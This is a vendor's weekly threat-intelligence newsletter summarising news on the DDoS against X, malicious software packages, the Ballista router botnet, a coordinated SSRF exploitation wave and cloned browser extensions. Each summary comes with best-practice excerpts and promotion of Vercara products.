Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.
NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
X Hit by ‘Massive Cyber-attack’ Amid Dark Storm’s DDoS Claims
(TLP: CLEAR) Intelligence reporting details a recent distributed denial-of-service (DDoS) attack targeting the social media platform X, causing a temporary outage to the platform’s services. The hacktivist collective known as “Dark Storm,” citing pro-Palestinian motivations, has claimed responsibility for orchestrating the DDoS attack. Although initially described by the platform owner Elon Musk as a “massive cyberattack,” attribution was uncertain until Musk later indicated attack traffic originated from Ukrainian IP addresses, a claim firmly denied by the hacktivist group, Dark Storm. The group later provided verification through the publicly accessible monitoring service Check-host[.]net, aligning with a common practice among hacktivists to substantiate successful attacks. Given the operational sophistication demonstrated, this campaign likely involved considerable resources, suggesting potential state-level involvement or support from a highly organized threat actor. Furthermore, the geopolitical context and conflicting claims surrounding this attack—especially Musk’s emphasis on Ukrainian IP attribution and Dark Storm’s explicit denial of Ukrainian involvement—the scenario highlights possible deceptive tactics, including IP spoofing or exploitation of compromised infrastructure. Security professionals must consider these complexities when evaluating attribution and remain vigilant against misinformation during cyber incidents.
(TLP: CLEAR) Comments: Given the broader geopolitical context—including rising tensions between the United States and Ukraine and Elon Musk’s prominent governmental role as head of the Department of Government Efficiency—attribution claims could potentially be leveraged for political influence, shaping public perception around international relations. Furthermore, the distinct ideological alignment of Dark Storm, a pro-Palestinian hacktivist collective, introduces additional complexities. It’s plausible that compromised devices within Ukraine’s digital infrastructure were unknowingly utilized by attackers, or the reported IP attribution itself may be misleading or incorrect.
(TLP: CLEAR) Recommended best practices/regulations: Critical Infrastructure and Security Agency (CISA), FBI, and Multi-State ISAC publication “Understanding and Responding to Distributed Denial-of-Service Attacks”: “Develop an organization DDoS response plan. The response plan should guide your organization through identifying, mitigating, and rapidly recovering from DDoS attacks. All internal stakeholders—including your organization’s leaders and network defenders—and service providers should understand their roles and responsibilities through all stages of a DDoS attack. At a minimum, the plan should include understanding the nature of a DDoS attack, confirming a DDoS attack, deploying mitigations, monitoring and recovery.
(TLP: CLEAR) Vercara: Vercara’s Protective DDoS solution, Vercara Ultra DDoS Protect, uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.
Source: https://www.bleepingcomputer.com/news/security/x-hit-by-massive-cyberattack-amid-dark-storms-ddos-claims/
Surge in Malicious Software Packages Exploits System Flaws
(TLP: CLEAR) Researchers have identified a significant increase in malicious software packages specifically designed to exploit system vulnerabilities using sophisticated obfuscation and stealth techniques. According to a recent Fortinet report analyzing threats detected since November 2024, threat actors are increasingly deploying lightweight, concealed software packages to infiltrate targeted systems, effectively bypassing conventional security defenses. Additionally, the report underscores a troubling surge in advanced evasion strategies, with threat actors releasing over a thousand malicious packages engineered to remain undetected. According to reporting, many of the malicious packages analyzed feature minimal file footprints, intentionally designed to reduce the likelihood of raising security alerts while effectively executing harmful payloads. Furthermore, reporting indicated that 1,052 of these packages include covert installation scripts capable of silently deploying malicious code onto victim systems without any user intervention or awareness. Further investigation into the malicious packages identified approximately 974 instances of active connections to command-and-control (C2) infrastructure via suspicious URLs, indicating their primary role was enabling remote exploitation and persistent attacker control. Additional analysis revealed another 681 packages leveraged common APIs such as https.get and https.request to stealthily exfiltrate sensitive data from infected systems, demonstrating the threat actors persistent reliance on subtle, yet effective methods for unauthorized data extraction.
(TLP: CLEAR) Comments: Many malicious software packages uncovered in the aforementioned investigation utilized suspicious installation scripts embedded with covert API calls. Such scripts facilitated the clandestine exfiltration of sensitive system data to external attacker-controlled servers, bypassing conventional detection mechanisms. Moreover, several packages deliberately omitted metadata or repository URLs, complicating scrutiny, traceability, and accurate attribution. Collectively, these evasive tactics underscore a concerning escalation in software supply chain threats, with adversaries increasingly manipulating trusted distribution channels to execute widespread malware deployments.
(TLP: CLEAR) Recommended best practices/regulations: OWASP API Top 10, API9:2023 “Improper Inventory Management”:
- Inventory all API hosts and document important aspects of each one of them, focusing on the API environment (e.g. production, staging, test, development), who should have network access to the host (e.g. public, internal, partners) and the API version.
- Inventory integrated services and document important aspects such as their role in the system, what data is exchanged (data flow), and their sensitivity.
- Document all aspects of your API such as authentication, errors, redirects, rate limiting, cross-origin resource sharing (CORS) policy, and endpoints, including their parameters, requests, and responses.
- Generate documentation automatically by adopting open standards. Include the documentation build in your CI/CD pipeline.
- Make API documentation available only to those authorized to use the API.
- Use external protection measures such as API security specific solutions for all exposed versions of your APIs, not just for the current production version.
- Avoid using production data with non-production API deployments. If this is unavoidable, these endpoints should get the same security treatment as the production ones.
- When newer versions of APIs include security improvements, perform a risk analysis to inform the mitigation actions required for the older versions. For example, whether it is possible to backport the improvements without breaking API compatibility or if you need to take the older version out quickly and force all clients to move to the latest version.
(TLP: CLEAR) Vercara: Vercara UltraAPI offers a comprehensive solution to the complex challenges security teams face in safeguarding API applications against cyber threats. It provides thorough discovery of the entire API landscape, including external and internal APIs, assesses API risk posture to highlight critical vulnerabilities needing remediation, and delivers real-time protection to prevent API attacks, ensuring data safety, preventing fraud, and avoiding business disruptions. This solution stands out by addressing every phase of the API security lifecycle, promoting best practices in security and governance to eliminate risks effectively. Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories, including botnet Command and Control (C2) as well as machine learning to detect previously uncategorized malicious associations and helps prevent data exfiltration or malware detonation.
Source: https://www.infosecurity-magazine.com/news/malicious-software-packages/
Ballista Botnet Exploits Unpatched TP-Link Vulnerability, Infects Over 6,000 Devices
(TLP: CLEAR) Intelligence reporting has highlighted the Ballista botnet, recently observed in the wild exploiting a critical remote code execution vulnerability (CVE-2023-1389) affecting TP-Link Archer AX-21 routers. First identified back in January 10, 2025, this ongoing malicious campaign specifically targets unpatched devices, stressing the continued risk posed by outdated or vulnerable router firmware. Although initially exploited by the Mirai botnet in April 2023, CVE-2023-1389 has since attracted numerous threat actors, including those specializing in malware variants such as Condi and AndroxGh0st. Ballista differentiates itself through an advanced autonomous propagation mechanism, systematically scanning for susceptible TP-Link Archer routers and subsequently exploiting CVE-2023-1389. Following successful exploitation, the malware deploys a dropper payload designed to retrieve and execute the primary Ballista binary, which supports diverse system architectures, including MIPS, MIPSEL, ARMv5l, ARMv7l, and x86_64. Once established, the botnet creates an encrypted command-and-control (C2) channel over port 82, enabling threat actors to remotely issue malicious commands. Ballista’s core functionalities include executing arbitrary shell commands, launching distributed denial-of-service (DDoS) attacks, and exfiltrating sensitive files from compromised devices. Additionally, Ballista utilizes advanced anti-forensic tactics, including terminating pre-existing malware processes and removing competing malware, to maintain stealth and persistent control over infected routers. Security researchers emphasize Ballista’s rapid, autonomous self-propagation capability, achieved by persistently scanning for and exploiting unpatched TP-Link routers vulnerable to CVE-2023-1389. Given the botnet’s sophisticated evasion tactics and ongoing propagation, it has been strongly advised immediate patching and comprehensive security monitoring be performed in order to mitigate this sophisticated botnet.
(TLP: CLEAR) Comments: Further analysis into the Ballista botnet campaign indicates a widespread global infection, with more than 6,000 devices already compromised. Countries experiencing the highest infection rates include Brazil, Poland, the United Kingdom, and Bulgaria, signaling a geographically dispersed threat landscape. To proactively mitigate the threat, users and administrators should promptly apply available firmware updates provided by TP-Link. Network security teams should remain vigilant, monitoring for suspicious network traffic and unusual outbound connections, specifically to port 82 or known TOR-based command-and-control (C2) servers.
(TLP: CLEAR) Recommended best practices/regulations: NIST Special Publication 800-189: “Source address spoofing is often combined with reflection and amplification from poorly administered open internet servers (e.g., DNS, NTP) to multiply the attack traffic volume by a factor of 50 or more. The attacker may use a single high-capacity computer with a high bandwidth internet connection or a botnet consisting of many compromised devices to send query requests to high-performance internet servers. The attacking systems employ source address spoofing, which inserts the IP address of the target as the source address in the requests. For internet services that use the User Datagram Protocol (UDP) (e.g., DNS, NTP), the query and response are each contained in a single packet, and the exchange does not require the establishment of a connection between the source and the server (unlike Transmission Control Protocol (TCP)). The responses from such open internet servers are directed to the attack target since the target’s IP address was forged as the source address field of the request messages. Often, the response from the server to the target address is much larger than the query itself, amplifying the effect of the DoS attack. Such reflection and amplification attacks can result in massive DDoS with attack volumes in the range of hundreds of Gbps.”
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in real-time and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.
Vercara UltraDDoS Protect is overseen by a 24/7 Security Operations Center (SOC) staffed by senior-level DDoS mitigation professionals who have the expertise, skills, and tools to thwart even the most sophisticated DDoS attacks.
Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in Coordinated Cyber Attack
(TLP: CLEAR) Back on March 9, security researchers observed a surge in exploit attempts leveraging Server-Side Request Forgery (SSRF) vulnerabilities, affecting various widely deployed software platforms. This sharp spike involved at least 400 unique IP addresses simultaneously targeting 10 distinct SSRF-related CVEs, a clear departure from routine background scanning typically attributed to common botnets. The synchronization and structure of this activity strongly suggest sophisticated, automated exploitation or targeted reconnaissance operations preceding potential compromise. According to reporting, the most heavily targeted regions during this exploitation wave included the United States, Germany, Singapore, India, and Japan, highlighting the global impact of the threat. It was also mentioned that Israel had previously experienced SSRF exploitation activity beginning in January, with renewed intensity observed in this latest campaign. Server-Side Request Forgery remains a critically important attack vector due to its potential for accessing internal cloud metadata APIs—valuable targets that attackers frequently exploit to harvest cloud credentials, establish network footholds, pivot laterally, and conduct extensive internal reconnaissance. Historically, SSRF vulnerabilities have proven especially damaging, most famously illustrated by the 2019 Capital One breach, which resulted in the exposure of over 100 million customer records. SSRF vulnerabilities allow attackers to target internal systems or access sensitive cloud metadata services. Attackers often leverage SSRF to extract sensitive credentials from cloud providers, conduct reconnaissance within internal networks, and pivot laterally after initial compromise.
(TLP: CLEAR) Comments: The recent exploitation campaign targeted vulnerabilities across several high-profile software platforms. Among these were CVE-2020-7796 in Zimbra Collaboration Suite, which allows attackers to interact directly with internal resources, posing significant risks to enterprise security, and CVE-2020-7796 remains widely targeted due to its potential for internal resource exploitation. Additionally, attackers exploited CVE-2021-22054 (VMware Workspace ONE UEM) and CVE-2021-21973 (VMware vCenter)—critical vulnerabilities enabling extensive unauthorized access within virtualized environments, further elevating the threat to corporate networks. The campaign also leveraged CVE-2024-6587, a newly identified SSRF flaw affecting BerriAI’s LiteLLM, highlighting attackers’ growing attention to exploiting vulnerabilities in emerging AI-driven tools and their underlying infrastructure. Furthermore, vulnerabilities such as CVE-2020-7796 (Zimbra Collaboration Suite), CVE-2020-7796, CVE-2021-39935 (GitLab Collaboration Suite), and CVE-2021-22054, along with CVE-2024-6587, underscore the persistent risk posed by SSRF threats. Additionally, exploitation included older yet often overlooked SSRF vulnerabilities like CVE-2017-0929 (DotNetNuke), demonstrating attackers’ ongoing reliance on legacy vulnerabilities to escalate privileges and access internal resources. Finally, the campaign utilized CVE-2024-5830 (ColumbiaSoft DocumentLocator) and CVE-2024-6587 (BerriAI LiteLLM), as attackers increasingly seek to exploit document management systems and AI-driven tools, indicating a strategic shift toward targeting critical business processes and emerging technologies.
(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 6.4.2: “For public-facing web applications, an automated technical solution is deployed that continually detects and prevents web-based attacks, with at least the following:
- Is installed in front of public-facing web applications and is configured to detect and prevent web-based attacks.
- Actively running and up to date as applicable.
- Generating audit logs.
- Configured to either block web-based attacks or generate an alert that is immediately investigated.
(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, helps prevent common exploits of vulnerabilities in web applications that could lead to the insertion of malware. Signatures for new vulnerabilities are constantly updated, along with granular input validation controls and traffic filtering measures for flexibility. UltraWAF includes a number of tools for managing both benign and malicious bots, including bot signatures and device fingerprinting. UltraWAF can also prevent some layer 7 DDoS attacks.
Source: https://thehackernews.com/2025/03/over-400-ips-exploiting-multiple-ssrf.html
Researchers Expose New Polymorphic Attack That Clones Browser Extensions to Steal Credentials
(TLP: CLEAR) Recent reporting sheds light on a new, sophisticated malware campaign involving polymorphic browser extensions designed to covertly harvest user credentials and sensitive information. According to security researchers, the aforementioned malicious extensions are engineered to seamlessly mimic legitimate browser extensions, including trusted password managers, cryptocurrency wallets, and banking applications. By generating pixel-perfect replicas of authentic extension icons, HTML popups, and interaction workflows, these polymorphic threats become virtually indistinguishable from the genuine tools they impersonate. Additionally, the attack briefly disables the authentic extension and replaces its interface elements with malicious visual replicas. This subtle manipulation convinces users they are interacting with a trusted extension, deceiving them into inadvertently revealing sensitive information, facilitating stealthy credential theft.
(TLP: CLEAR) Comments: The attack begins when victims unknowingly install a malicious polymorphic browser extension disguised as an AI-powered marketing tool, typically promoted through popular social media platforms. Once initiated, the installation prompts users via a popup to pin the extension, allegedly enhancing its functionality. To maintain credibility and avoid suspicion, the malicious extension initially provides the promised AI marketing services. In order to protect against such sophisticated threats, organizations and individuals should adopt browser-native security solutions that dynamically analyze extension behaviors in real-time. Such proactive measures can detect anomalous activities, including polymorphic patterns, even if they surface well after installation.
(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION
Control:
- Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.
- Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.
- Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection.
- Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.
NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defense-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client.
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.